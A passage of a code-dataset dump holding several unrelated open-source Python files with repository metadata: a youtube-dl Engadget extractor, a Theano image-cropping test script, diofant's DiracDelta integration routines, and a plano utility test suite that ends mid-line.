        npt.assert_array_equal(known_ratio, test_ratio)


if __name__ == '__main__':
    main()
jwdebelius/Machiavellian
machivellian/tests/test_power.py
Python
bsd-3-clause
10,523
[ "scikit-bio" ]
f7fc9e151e58fe9f7249a7eaab8fc79bdfd9e11ea9f6c30e8664688eb1515511
from __future__ import unicode_literals from .common import InfoExtractor class EngadgetIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.)?engadget\.com/video/(?P<id>[^/?#]+)' _TESTS = [{ # video with 5min ID 'url': 'http://www.engadget.com/video/518153925/', 'md5': 'c6820d4828a5064447a4d9fc73f312c9', 'info_dict': { 'id': '518153925', 'ext': 'mp4', 'title': 'Samsung Galaxy Tab Pro 8.4 Review', }, 'add_ie': ['FiveMin'], }, { # video with vidible ID 'url': 'https://www.engadget.com/video/57a28462134aa15a39f0421a/', 'only_matching': True, }] def _real_extract(self, url): video_id = self._match_id(url) return self.url_result('aol-video:%s' % video_id)
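
# Usage note: in practice this extractor is exercised through the youtube-dl
# CLI or test harness rather than called directly, e.g.
#
#     youtube-dl "http://www.engadget.com/video/518153925/"
#
# which matches _VALID_URL above and is re-routed to the aol-video handler
# via url_result().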
remitamine/youtube-dl
youtube_dl/extractor/engadget.py
Python
unlicense
807
[ "Galaxy" ]
179764d4fd38a4d27502ec70cde35dd4dfcf9b480ddfa9f89f0a4d8993963195
import theano import theano.tensor as T from crop import LocallySoftRectangularCropper from crop import Gaussian import numpy as np from datasets import get_cooking_streams from datasets import get_bmnist_streams import matplotlib # Force matplotlib to not use any Xwindows backend. matplotlib.use('Agg') import matplotlib.pyplot as plt def draw(img): if img.shape[0] == 1: plt.imshow(img[0], cmap=plt.get_cmap('gray'), interpolation='nearest') else: plt.imshow(np.swapaxes(img[:, :, :, np.newaxis], 0, 3)[0], interpolation='nearest') location = T.fmatrix() scale = T.fmatrix() alpha = T.fmatrix() x = T.fvector() batch_size = 1 num_channel = 1 patch_shape = (28, 28) image_shape = (100, 100) hyperparameters = {} hyperparameters["cutoff"] = 3000 hyperparameters["batched_window"] = True # tds, _ = get_cooking_streams(batch_size) tds, _ = get_bmnist_streams(1) res = tds.get_epoch_iterator(as_dict=True).next()['features'] # shape: 3 x 125 x 200 img = res[5, 0] draw(img) plt.savefig('img.png') cropper = LocallySoftRectangularCropper( patch_shape=patch_shape, hyperparameters=hyperparameters, kernel=Gaussian()) patch1, matrix, dx2 = cropper.apply( x.reshape((batch_size, num_channel,) + image_shape), np.array([list(image_shape)]), location, scale, alpha) grads = T.grad(T.mean(patch1), x) grad_scale = abs(T.grad(T.mean(patch1), scale)) grad_location = abs(T.grad(T.mean(patch1), location)) grad_alpha = abs(T.grad(T.mean(patch1), alpha)) f = theano.function( [x, location, scale, alpha], [patch1, grads, grad_scale + grad_location + grad_alpha, matrix, dx2], allow_input_downcast=True) image = img.flatten().astype('float32') locations = [[50, 50], [100, 70], [10, 190]] scales = [[0.28, 0.28], [0.6, 0.6], [1, 1]] alphas = [[0.001, 0.001], [0.5, 0.5], [0.9, 0.9]] res = f(image, [[50, 50]], [[0.4, 0.4]], [[0.001, 0.001]]) import ipdb; ipdb.set_trace() for i in np.arange(1): for j in np.arange(1): for k in np.arange(3): location_ = [locations[i]] scale_ = [scales[j]] alpha_ = [alphas[k]] plt.figure() plt.subplot(131) p = f(image, location_, scale_, alpha_)[0][0] # import ipdb; ipdb.set_trace() draw(p) plt.subplot(132) if num_channel == 3: g = np.abs(f(image, location_, scale_, alpha_)[1].reshape( 3, image_shape[0], image_shape[1])) g = np.sum(g, axis=0) else: g = np.abs(f(image, location_, scale_, alpha_)[1].reshape( image_shape[0], image_shape[1])) g = (g - g.mean()) / g.std() plt.imshow(g[1:-1, 1:-1], cmap=plt.get_cmap('gray'), interpolation='nearest') plt.subplot(133) m = np.abs(f(image, location_, scale_, alpha_)[3][0]) res = f(image, location_, scale_, alpha_)[4] plt.imshow(m, interpolation='nearest', vmin=0, vmax=1) plt.tight_layout() plt.savefig('sample' + str(i) + str(j) + str(k) + '.png', dpi=450) print np.abs(f(image, location_, scale_, alpha_)[2])
negar-rostamzadeh/rna
test_crop.py
Python
mit
3,244
[ "Gaussian" ]
332dc11a6480f2110477ebca7ac47d287cf5aee32448fb86e7df16b141ab5192
from ..core import Mul from ..core.compatibility import default_sort_key from ..functions import DiracDelta, Heaviside def change_mul(node, x): """change_mul(node, x) Rearranges the operands of a product, bringing to front any simple DiracDelta expression. If no simple DiracDelta expression was found, then all the DiracDelta expressions are simplified (using DiracDelta.simplify). Return: (dirac, new node) Where: o dirac is either a simple DiracDelta expression or None (if no simple expression was found); o new node is either a simplified DiracDelta expressions or None (if it could not be simplified). Examples ======== >>> change_mul(x*y*DiracDelta(x)*cos(x), x) (DiracDelta(x), x*y*cos(x)) >>> change_mul(x*y*DiracDelta(x**2 - 1)*cos(x), x) (None, x*y*cos(x)*DiracDelta(x - 1)/2 + x*y*cos(x)*DiracDelta(x + 1)/2) >>> change_mul(x*y*DiracDelta(cos(x))*cos(x), x) (None, None) See Also ======== diofant.functions.special.delta_functions.DiracDelta deltaintegrate """ if not (node.is_Mul or node.is_Pow): return node new_args = [] dirac = None # Sorting is needed so that we consistently collapse the same delta; # However, we must preserve the ordering of non-commutative terms c, nc = node.args_cnc() sorted_args = sorted(c, key=default_sort_key) sorted_args.extend(nc) for arg in sorted_args: if arg.is_Pow and isinstance(arg.base, DiracDelta): new_args.append(arg.func(arg.base, arg.exp - 1)) arg = arg.base if dirac is None and (isinstance(arg, DiracDelta) and arg.is_simple(x) and (len(arg.args) <= 1 or arg.args[1] == 0)): dirac = arg else: new_args.append(arg) if not dirac: # there was no simple dirac new_args = [] for arg in sorted_args: if isinstance(arg, DiracDelta): new_args.append(arg.simplify(x)) elif arg.is_Pow and isinstance(arg.base, DiracDelta): new_args.append(arg.func(arg.base.simplify(x), arg.exp)) else: new_args.append(change_mul(arg, x)) if new_args != sorted_args: nnode = Mul(*new_args).expand() else: # if the node didn't change there is nothing to do nnode = None return None, nnode return dirac, Mul(*new_args) def deltaintegrate(f, x): """ deltaintegrate(f, x) The idea for integration is the following: - If we are dealing with a DiracDelta expression, i.e. DiracDelta(g(x)), we try to simplify it. If we could simplify it, then we integrate the resulting expression. We already know we can integrate a simplified expression, because only simple DiracDelta expressions are involved. If we couldn't simplify it, there are two cases: 1) The expression is a simple expression: we return the integral, taking care if we are dealing with a Derivative or with a proper DiracDelta. 2) The expression is not simple (i.e. DiracDelta(cos(x))): we can do nothing at all. - If the node is a multiplication node having a DiracDelta term: First we expand it. If the expansion did work, then we try to integrate the expansion. If not, we try to extract a simple DiracDelta term, then we have two cases: 1) We have a simple DiracDelta term, so we return the integral. 2) We didn't have a simple term, but we do have an expression with simplified DiracDelta terms, so we integrate this expression. 
Examples ======== >>> deltaintegrate(x*sin(x)*cos(x)*DiracDelta(x - 1), x) sin(1)*cos(1)*Heaviside(x - 1) >>> deltaintegrate(y**2*DiracDelta(x - z)*DiracDelta(y - z), y) z**2*DiracDelta(x - z)*Heaviside(y - z) See Also ======== diofant.functions.special.delta_functions.DiracDelta diofant.integrals.integrals.Integral """ if not f.has(DiracDelta): return from .integrals import Integral, integrate from ..solvers import solve # g(x) = DiracDelta(h(x)) if f.func == DiracDelta: h = f.simplify(x) if h == f: # can't simplify the expression # FIXME: the second term tells whether is DeltaDirac or Derivative # For integrating derivatives of DiracDelta we need the chain rule if f.is_simple(x): if (len(f.args) <= 1 or f.args[1] == 0): return Heaviside(f.args[0]) else: return (DiracDelta(f.args[0], f.args[1] - 1) / f.args[0].as_poly().LC()) else: # let's try to integrate the simplified expression fh = integrate(h, x) return fh elif f.is_Mul or f.is_Pow: # g(x) = a*b*c*f(DiracDelta(h(x)))*d*e g = f.expand() if f != g: # the expansion worked fh = integrate(g, x) if fh is not None and not isinstance(fh, Integral): return fh else: # no expansion performed, try to extract a simple DiracDelta term dg, rest_mult = change_mul(f, x) if not dg: if rest_mult: fh = integrate(rest_mult, x) return fh else: dg = dg.simplify(x) if dg.is_Mul: # Take out any extracted factors dg, rest_mult_2 = change_mul(dg, x) rest_mult = rest_mult*rest_mult_2 point = solve(dg.args[0], x)[0][x] return (rest_mult.subs({x: point})*Heaviside(x - point))
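
# Illustrative sketch mirroring the doctests above; assumes ``diofant.abc``
# provides the symbol ``x`` and that ``sin``/``cos`` live in
# ``diofant.functions``, as used elsewhere in this package.
def _demo_deltaintegrate():
    from ..abc import x
    from ..functions import cos, sin
    # The delta collapses the integrand at its root, x = 1, giving
    # sin(1)*cos(1)*Heaviside(x - 1) per the docstring example above.
    return deltaintegrate(x*sin(x)*cos(x)*DiracDelta(x - 1), x)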
skirpichev/omg
diofant/integrals/deltafunctions.py
Python
bsd-3-clause
5,793
[ "DIRAC" ]
5abd52c7cdece50c7f2a29f50a05dd792ec6bd639a63da6a64d19c4b3fb50fa3
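A minimal usage sketch for the module above. The import paths are inferred from the repo path shown in this row (diofant/integrals/deltafunctions.py) and assume a working diofant installation; the expected outputs in the comments mirror the docstring examples rather than a fresh run.

# Sketch, assuming diofant exposes DiracDelta, sin, cos, and symbols at top level.
from diofant import DiracDelta, cos, sin, symbols
from diofant.integrals.deltafunctions import change_mul, deltaintegrate

x, y, z = symbols('x y z')

# A simple delta factor is pulled to the front of the product.
print(change_mul(x*y*DiracDelta(x)*cos(x), x))
# -> (DiracDelta(x), x*y*cos(x))

# Integrating against a shifted delta picks out the integrand at x = 1,
# times a Heaviside step recording where the delta has been crossed.
print(deltaintegrate(x*sin(x)*cos(x)*DiracDelta(x - 1), x))
# -> sin(1)*cos(1)*Heaviside(x - 1)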
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # import os as _os import pwd as _pwd import signal as _signal import socket as _socket import sys as _sys import threading as _threading try: import http.server as _http except ImportError: # pragma: nocover import BaseHTTPServer as _http from plano import * test_project_dir = join(get_parent_dir(get_parent_dir(__file__)), "test-project") class test_project(working_dir): def __enter__(self): dir = super(test_project, self).__enter__() copy(test_project_dir, ".", inside=False) return dir TINY_INTERVAL = 0.05 @test def archive_operations(): with working_dir(): make_dir("some-dir") touch("some-dir/some-file") make_archive("some-dir") assert is_file("some-dir.tar.gz") extract_archive("some-dir.tar.gz", output_dir="some-subdir") assert is_dir("some-subdir/some-dir") assert is_file("some-subdir/some-dir/some-file") rename_archive("some-dir.tar.gz", "something-else") assert is_file("something-else.tar.gz") extract_archive("something-else.tar.gz") assert is_dir("something-else") assert is_file("something-else/some-file") @test def command_operations(): class SomeCommand(BaseCommand): def __init__(self): self.parser = BaseArgumentParser() self.parser.add_argument("--interrupt", action="store_true") self.parser.add_argument("--explode", action="store_true") def parse_args(self, args): return self.parser.parse_args(args) def init(self, args): self.verbose = args.verbose self.interrupt = args.interrupt self.explode = args.explode def run(self): if self.verbose: print("Hello") if self.interrupt: raise KeyboardInterrupt() if self.explode: raise PlanoError("Exploded") SomeCommand().main([]) SomeCommand().main(["--interrupt"]) with expect_system_exit(): SomeCommand().main(["--verbose", "--explode"]) @test def console_operations(): eprint("Here's a story") eprint("About a", "man named Brady") pprint(list_dir()) pprint(PlanoProcess, 1, "abc", end="\n\n") flush() with console_color("red"): print("ALERT") print(cformat("AMBER ALERT", color="yellow")) print(cformat("NO ALERT")) cprint("CRITICAL ALERT", color="red", bright=True) @test def dir_operations(): with working_dir(): test_dir = make_dir("some-dir") test_file_1 = touch(join(test_dir, "some-file-1")) test_file_2 = touch(join(test_dir, "some-file-2")) result = list_dir(test_dir) assert join(test_dir, result[0]) == test_file_1, (join(test_dir, result[0]), test_file_1) result = list_dir(test_dir, "*-file-1") assert result == ["some-file-1"], (result, ["some-file-1"]) result = list_dir(test_dir, exclude="*-file-1") assert result == ["some-file-2"], (result, ["some-file-2"]) result = list_dir("some-dir", "*.not-there") assert result == [], result with working_dir(): result = list_dir() assert result == [], result result = find(test_dir) assert result == [test_file_1, test_file_2], (result, 
[test_file_1, test_file_2]) result = find(test_dir, "*-file-1") assert result == [test_file_1], (result, [test_file_1]) result = find(test_dir, exclude="*-file-1") assert result == [test_file_2], (result, [test_file_2]) with working_dir(): result = find() assert result == [], result with working_dir(): with working_dir("a-dir", quiet=True): touch("a-file") curr_dir = get_current_dir() prev_dir = change_dir("a-dir") new_curr_dir = get_current_dir() new_prev_dir = change_dir(curr_dir) assert curr_dir == prev_dir, (curr_dir, prev_dir) assert new_curr_dir == new_prev_dir, (new_curr_dir, new_prev_dir) @test def env_operations(): result = join_path_var("a", "b", "c", "a") assert result == "a:b:c", result curr_dir = get_current_dir() with working_dir("."): assert get_current_dir() == curr_dir, (get_current_dir(), curr_dir) result = get_home_dir() assert result == ENV["HOME"], result result = get_home_dir("alice") assert result.endswith("alice"), result user = _pwd.getpwuid(_os.getuid())[0] result = get_user() assert result == user, (result, user) result = get_hostname() assert result, result result = get_program_name() assert result, result result = get_program_name("alpha beta") assert result == "alpha", result result = get_program_name("X=Y alpha beta") assert result == "alpha", result result = which("echo") assert result, result with working_env(YES_I_AM_SET=1): check_env("YES_I_AM_SET") with expect_error(): check_env("NO_I_AM_NOT") with working_env(I_AM_SET_NOW=1, amend=False): check_env("I_AM_SET_NOW") assert "YES_I_AM_SET" not in ENV, ENV with working_env(SOME_VAR=1): assert ENV["SOME_VAR"] == "1", ENV.get("SOME_VAR") with working_env(SOME_VAR=2): assert ENV["SOME_VAR"] == "2", ENV.get("SOME_VAR") with expect_error(): check_program("not-there") with expect_error(): check_module("not_there") with expect_output(contains="ARGS:") as out: with open(out, "w") as f: print_env(file=f) @test def file_operations(): with working_dir(): alpha_dir = make_dir("alpha-dir") alpha_file = touch(join(alpha_dir, "alpha-file")) alpha_link = make_link(join(alpha_dir, "alpha-file-link"), "alpha-file") alpha_broken_link = make_link(join(alpha_dir, "broken-link"), "no-such-file") beta_dir = make_dir("beta-dir") beta_file = touch(join(beta_dir, "beta-file")) beta_link = make_link(join(beta_dir, "beta-file-link"), "beta-file") beta_broken_link = make_link(join(beta_dir, "broken-link"), join("..", alpha_dir, "no-such-file")) beta_another_link = make_link(join(beta_dir, "broken-link"), join("..", alpha_dir, "alpha-file-link")) assert exists(beta_link) assert exists(beta_file) with working_dir("beta-dir"): assert is_file(read_link("beta-file-link")) copied_file = copy(alpha_file, beta_dir) assert copied_file == join(beta_dir, "alpha-file"), copied_file assert is_file(copied_file), list_dir(beta_dir) copied_link = copy(beta_link, join(beta_dir, "beta-file-link-copy")) assert copied_link == join(beta_dir, "beta-file-link-copy"), copied_link assert is_link(copied_link), list_dir(beta_dir) copied_dir = copy(alpha_dir, beta_dir) assert copied_dir == join(beta_dir, "alpha-dir"), copied_dir assert is_link(join(copied_dir, "alpha-file-link")) moved_file = move(beta_file, alpha_dir) assert moved_file == join(alpha_dir, "beta-file"), moved_file assert is_file(moved_file), list_dir(alpha_dir) assert not exists(beta_file), list_dir(beta_dir) moved_dir = move(beta_dir, alpha_dir) assert moved_dir == join(alpha_dir, "beta-dir"), moved_dir assert is_dir(moved_dir), list_dir(alpha_dir) assert not exists(beta_dir) gamma_dir = 
make_dir("gamma-dir") gamma_file = touch(join(gamma_dir, "gamma-file")) delta_dir = make_dir("delta-dir") delta_file = touch(join(delta_dir, "delta-file")) copy(gamma_dir, delta_dir, inside=False) assert is_file(join("delta-dir", "gamma-file")) move(gamma_dir, delta_dir, inside=False) assert is_file(join("delta-dir", "gamma-file")) assert not exists(gamma_dir) epsilon_dir = make_dir("epsilon-dir") epsilon_file_1 = touch(join(epsilon_dir, "epsilon-file-1")) epsilon_file_2 = touch(join(epsilon_dir, "epsilon-file-2")) epsilon_file_3 = touch(join(epsilon_dir, "epsilon-file-3")) epsilon_file_4 = touch(join(epsilon_dir, "epsilon-file-4")) remove("not-there") remove(epsilon_file_2) assert not exists(epsilon_file_2) remove(epsilon_dir) assert not exists(epsilon_file_1) assert not exists(epsilon_dir) remove([epsilon_file_3, epsilon_file_4]) assert not exists(epsilon_file_3) assert not exists(epsilon_file_4) file = write("xes", "x" * 10) result = get_file_size(file) assert result == 10, result @test def http_operations(): class Handler(_http.BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.end_headers() self.wfile.write(b"[1]") def do_POST(self): length = int(self.headers["content-length"]) content = self.rfile.read(length) self.send_response(200) self.end_headers() self.wfile.write(content) def do_PUT(self): length = int(self.headers["content-length"]) content = self.rfile.read(length) self.send_response(200) self.end_headers() class ServerThread(_threading.Thread): def __init__(self, server): _threading.Thread.__init__(self) self.server = server def run(self): self.server.serve_forever() host, port = "localhost", get_random_port() url = "http://{0}:{1}".format(host, port) server = _http.HTTPServer((host, port), Handler) server_thread = ServerThread(server) server_thread.start() try: with working_dir(): result = http_get(url) assert result == "[1]", result result = http_get(url, insecure=True) assert result == "[1]", result result = http_get(url, output_file="a") output = read("a") assert result is None, result assert output == "[1]", output result = http_get_json(url) assert result == [1], result file_b = write("b", "[2]") result = http_post(url, read(file_b), insecure=True) assert result == "[2]", result result = http_post(url, read(file_b), output_file="x") output = read("x") assert result is None, result assert output == "[2]", output result = http_post_file(url, file_b) assert result == "[2]", result result = http_post_json(url, parse_json(read(file_b))) assert result == [2], result file_c = write("c", "[3]") result = http_put(url, read(file_c), insecure=True) assert result is None, result result = http_put_file(url, file_c) assert result is None, result result = http_put_json(url, parse_json(read(file_c))) assert result is None, result finally: server.shutdown() server.server_close() server_thread.join() @test def io_operations(): with working_dir(): input_ = "some-text\n" file_a = write("a", input_) output = read(file_a) assert input_ == output, (input_, output) pre_input = "pre-some-text\n" post_input = "post-some-text\n" prepend(file_a, pre_input) append(file_a, post_input) output = tail(file_a, 100) tailed = tail(file_a, 1) assert output.startswith(pre_input), (output, pre_input) assert output.endswith(post_input), (output, post_input) assert tailed == post_input, (tailed, post_input) input_lines = [ "alpha\n", "beta\n", "gamma\n", ] file_b = write_lines("b", input_lines) output_lines = read_lines(file_b) assert input_lines == output_lines, (input_lines, 
output_lines) pre_lines = ["pre-alpha\n"] post_lines = ["post-gamma\n"] prepend_lines(file_b, pre_lines) append_lines(file_b, post_lines) output_lines = tail_lines(file_b, 100) tailed_lines = tail_lines(file_b, 1) assert output_lines[0] == pre_lines[0], (output_lines[0], pre_lines[0]) assert output_lines[4] == post_lines[0], (output_lines[4], post_lines[0]) assert tailed_lines[0] == post_lines[0], (tailed_lines[0], post_lines[0]) file_c = touch("c") assert is_file(file_c), file_c file_d = write("d", "front@middle@@middle@back") replace_in_file(file_d, "@middle@", "M", count=1) result = read(file_d) assert result == "frontM@middle@back", result @test def iterable_operations(): result = unique([1, 1, 1, 2, 2, 3]) assert result == [1, 2, 3], result result = skip([1, "", 2, None, 3]) assert result == [1, 2, 3], result result = skip([1, "", 2, None, 3], 2) assert result == [1, "", None, 3], result @test def json_operations(): with working_dir(): input_data = { "alpha": [1, 2, 3], } file_a = write_json("a", input_data) output_data = read_json(file_a) assert input_data == output_data, (input_data, output_data) json = read(file_a) parsed_data = parse_json(json) emitted_json = emit_json(input_data) assert input_data == parsed_data, (input_data, parsed_data) assert json == emitted_json, (json, emitted_json) @test def link_operations(): with working_dir(): make_dir("some-dir") path = get_absolute_path(touch("some-dir/some-file")) with working_dir("another-dir"): link = make_link("a-link", path) linked_path = read_link(link) assert linked_path == path, (linked_path, path) @test def logging_operations(): error("Error!") warn("Warning!") notice("Take a look!") notice(123) debug("By the way") debug("abc{0}{1}{2}", 1, 2, 3) with expect_exception(RuntimeError): fail(RuntimeError("Error!")) with expect_error(): fail("Error!") for level in ("debug", "notice", "warn", "error"): with expect_output(contains="Hello") as out: with logging_disabled(): with logging_enabled(level=level, output=out): log(level, "hello") with expect_output(equals="") as out: with logging_enabled(output=out): with logging_disabled(): error("Yikes") @test def path_operations(): with working_dir("/"): curr_dir = get_current_dir() assert curr_dir == "/", curr_dir path = "a/b/c" result = get_absolute_path(path) assert result == join(curr_dir, path), result path = "/x/y/z" result = get_absolute_path(path) assert result == path, result path = "/x/y/z" assert is_absolute(path) path = "x/y/z" assert not is_absolute(path) path = "a//b/../c/" result = normalize_path(path) assert result == "a/c", result path = "/a/../c" result = get_real_path(path) assert result == "/c", result path = "/a/b" result = get_relative_path(path, "/a/c") assert result == "../b", result path = "/a/b" result = get_file_url(path) assert result == "file:/a/b", result with working_dir(): result = get_file_url("afile") assert result == "file:{0}/afile".format(get_current_dir()), result path = "/alpha/beta.ext" path_split = "/alpha", "beta.ext" path_split_extension = "/alpha/beta", ".ext" name_split_extension = "beta", ".ext" result = join(*path_split) assert result == path, result result = split(path) assert result == path_split, result result = split_extension(path) assert result == path_split_extension, result result = get_parent_dir(path) assert result == path_split[0], result result = get_base_name(path) assert result == path_split[1], result result = get_name_stem(path) assert result == name_split_extension[0], result result = get_name_stem("alpha.tar.gz") assert result 
== "alpha", result result = get_name_extension(path) assert result == name_split_extension[1], result with working_dir(): touch("adir/afile") check_exists("adir") check_exists("adir/afile") check_dir("adir") check_file("adir/afile") with expect_error(): check_exists("adir/notafile") with expect_error(): check_file("adir/notafile") with expect_error(): check_file("adir") with expect_error(): check_dir("not-there") with expect_error(): check_dir("adir/afile") await_exists("adir/afile") with expect_timeout(): await_exists("adir/notafile", timeout=TINY_INTERVAL) @test def port_operations(): result = get_random_port() assert result >= 49152 and result <= 65535, result server_port = get_random_port() server_socket = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM) try: server_socket.bind(("localhost", server_port)) server_socket.listen(5) await_port(server_port) await_port(str(server_port)) check_port(server_port) with expect_error(): get_random_port(min=server_port, max=server_port) finally: server_socket.close() with expect_timeout(): await_port(get_random_port(), timeout=TINY_INTERVAL) @test def process_operations(): result = get_process_id() assert result, result proc = run("date") assert proc is not None, proc print(repr(proc)) run("date", stash=True) proc = run(["echo", "hello"], check=False) assert proc.exit_code == 0, proc.exit_code proc = run("cat /uh/uh", check=False) assert proc.exit_code > 0, proc.exit_code with expect_output() as out: run("date", output=out) run("date", output=DEVNULL) run("date", stdin=DEVNULL) run("date", stdout=DEVNULL) run("date", stderr=DEVNULL) run("echo hello", quiet=True) run("echo hello | cat", shell=True) run(["echo", "hello"], shell=True) with expect_error(): run("/not/there") with expect_error(): run("cat /whoa/not/really", stash=True) result = call("echo hello") assert result == "hello\n", result result = call("echo hello | cat", shell=True) assert result == "hello\n", result with expect_error(): call("cat /whoa/not/really") if PYTHON3: proc = start("sleep 10") with expect_timeout(): wait(proc, timeout=TINY_INTERVAL) proc = start("echo hello") sleep(TINY_INTERVAL) stop(proc) proc = start("sleep 10") stop(proc) proc = start("sleep 10") kill(proc) sleep(TINY_INTERVAL) stop(proc) proc = start("date --not-there") sleep(TINY_INTERVAL) stop(proc) with start("sleep 10"): sleep(TINY_INTERVAL) with working_dir(): touch("i") with start("date", stdin="i", stdout="o", stderr="e"): pass with expect_system_exit(): exit() with expect_system_exit(): exit(verbose=True) with expect_system_exit(): exit("abc") with expect_system_exit(): exit("abc", verbose=True) with expect_system_exit(): exit(Exception()) with expect_system_exit(): exit(Exception(), verbose=True) with expect_system_exit(): exit(123) with expect_system_exit(): exit(123, verbose=True) with expect_system_exit(): exit(-123) with expect_exception(PlanoException): exit(object()) @test def string_operations(): result = replace("ab", "a", "b") assert result == "bb", result result = replace("aba", "a", "b", count=1) assert result == "bba", result result = remove_prefix(None, "xxx") assert result == "", result result = remove_prefix("anterior", "ant") assert result == "erior", result result = remove_prefix("anterior", "ext") assert result == "anterior", result result = remove_suffix(None, "xxx") assert result == "", result result = remove_suffix("exterior", "ior") assert result == "exter", result result = remove_suffix("exterior", "nal") assert result == "exterior" result = shorten("abc", 2) assert result == 
"ab", result result = shorten("abc", None) assert result == "abc", result result = shorten("abc", 10) assert result == "abc", result result = shorten("ellipsis", 6, ellipsis="...") assert result == "ell...", result result = shorten(None, 6) assert result == "", result result = plural(None) assert result == "", result result = plural("") assert result == "", result result = plural("test") assert result == "tests", result result = plural("test", 1) assert result == "test", result result = plural("bus") assert result == "busses", result result = plural("bus", 1) assert result == "bus", result result = plural("terminus", 2, "termini") assert result == "termini", result result = capitalize(None) assert result == "", result result = capitalize("") assert result == "", result result = capitalize("hello, Frank") assert result == "Hello, Frank", result encoded_result = base64_encode(b"abc") decoded_result = base64_decode(encoded_result) assert decoded_result == b"abc", decoded_result encoded_result = url_encode("abc=123&yeah!") decoded_result = url_decode(encoded_result) assert decoded_result == "abc=123&yeah!", decoded_result @test def temp_operations(): system_temp_dir = get_system_temp_dir() result = make_temp_file() assert result.startswith(system_temp_dir), result result = make_temp_file(suffix=".txt") assert result.endswith(".txt"), result result = make_temp_dir() assert result.startswith(system_temp_dir), result with temp_dir() as d: assert is_dir(d), d list_dir(d) with temp_file() as f: assert is_file(f), f write(f, "test") with working_dir() as d: assert is_dir(d), d list_dir(d) user_temp_dir = get_user_temp_dir() assert user_temp_dir, user_temp_dir ENV.pop("XDG_RUNTIME_DIR", None) user_temp_dir = get_user_temp_dir() assert user_temp_dir, user_temp_dir @test def test_operations(): with test_project(): with working_module_path("python"): import chucker import chucker_tests print_tests(chucker_tests) for verbose in (False, True): run_tests(chucker_tests, verbose=verbose) run_tests(chucker_tests, exclude="*hello*", verbose=verbose) with expect_error(): run_tests(chucker, verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="*badbye*", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="*badbye*", fail_fast=True, verbose=verbose) with expect_exception(KeyboardInterrupt): run_tests(chucker_tests, enable="test_keyboard_interrupt", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="test_timeout", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="test_process_error", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="test_system_exit", verbose=verbose) with expect_system_exit(): PlanoTestCommand().main(["--module", "nosuchmodule"]) def run_command(*args): PlanoTestCommand(chucker_tests).main(args) run_command("--verbose") run_command("--list") with expect_system_exit(): run_command("--enable", "*badbye*") with expect_system_exit(): run_command("--enable", "*badbye*", "--verbose") try: with expect_exception(): pass raise Exception() # pragma: nocover except AssertionError: pass with expect_output(equals="abc123", contains="bc12", startswith="abc", endswith="123") as out: write(out, "abc123") @test def time_operations(): start_time = get_time() sleep(TINY_INTERVAL) assert get_time() - start_time > TINY_INTERVAL with expect_system_exit(): with start("sleep 10"): from plano import _default_sigterm_handler _default_sigterm_handler(_signal.SIGTERM, None) result = format_duration(0.1) assert result == "0.1s", 
result result = format_duration(1) assert result == "1s", result result = format_duration(1, align=True) assert result == "1.0s", result result = format_duration(60) assert result == "60s", result result = format_duration(3600) assert result == "1h", result with Timer() as timer: sleep(TINY_INTERVAL) assert timer.elapsed_time > TINY_INTERVAL assert timer.elapsed_time > TINY_INTERVAL with expect_timeout(): with Timer(timeout=TINY_INTERVAL) as timer: sleep(10) @test def unique_id_operations(): id1 = get_unique_id() id2 = get_unique_id() assert id1 != id2, (id1, id2) result = get_unique_id(1) assert len(result) == 2 result = get_unique_id(16) assert len(result) == 32 @test def value_operations(): result = nvl(None, "a") assert result == "a", result result = nvl("b", "a") assert result == "b", result assert is_string("a") assert not is_string(1) for value in (None, "", (), [], {}): assert is_empty(value), value for value in (object(), " ", (1,), [1], {"a": 1}): assert not is_empty(value), value result = pformat({"z": 1, "a": 2}) assert result == "{'a': 2, 'z': 1}", result result = format_empty((), "[nothing]") assert result == "[nothing]", result result = format_empty((1,), "[nothing]") assert result == (1,), result result = format_not_empty("abc", "[{0}]") assert result == "[abc]", result result = format_not_empty({}, "[{0}]") assert result == {}, result result = format_repr(Namespace(a=1, b=2), limit=1) assert result == "Namespace(a=1)", result result = Namespace(a=1, b=2) assert result.a == 1, result assert result.b == 2, result assert "a" in result, result assert "c" not in result, result repr(result) other = Namespace(a=1, b=2, c=3) assert result != other, (result, other) @test def yaml_operations(): try: import yaml as _yaml except ImportError: raise PlanoTestSkipped("PyYAML is not available") with working_dir(): input_data = { "alpha": [1, 2, 3], } file_a = write_yaml("a", input_data) output_data = read_yaml(file_a) assert input_data == output_data, (input_data, output_data) yaml = read(file_a) parsed_data = parse_yaml(yaml) emitted_yaml = emit_yaml(input_data) assert input_data == parsed_data, (input_data, parsed_data) assert yaml == emitted_yaml, (yaml, emitted_yaml) @test def plano_command(): if PYTHON2: # pragma: nocover raise PlanoTestSkipped("The plano command is not supported on Python 2") with working_dir(): PlanoCommand().main([]) with working_dir(): write("Planofile", "garbage") with expect_system_exit(): PlanoCommand().main([]) with expect_system_exit(): PlanoCommand("no-such-file").main([]) with expect_system_exit(): PlanoCommand().main(["-f", "no-such-file"]) def run_command(*args): PlanoCommand().main(["-f", test_project_dir] + list(args)) with test_project(): run_command() run_command("--help") run_command("--quiet") run_command("--init-only") run_command("build") run_command("install") run_command("clean") with expect_system_exit(): run_command("build", "--help") with expect_system_exit(): run_command("no-such-command") with expect_system_exit(): run_command("no-such-command", "--help") with expect_system_exit(): run_command("--help", "no-such-command") run_command("extended-command", "a", "b", "--omega", "z") with expect_system_exit(): run_command("echo") with expect_exception(contains="Trouble"): run_command("echo", "Hello", "--trouble") run_command("echo", "Hello", "--count", "5") with expect_system_exit(): run_command("echo", "Hello", "--count", "not-an-int") run_command("haberdash", "ballcap", "fedora", "hardhat", "--last", "turban") result = 
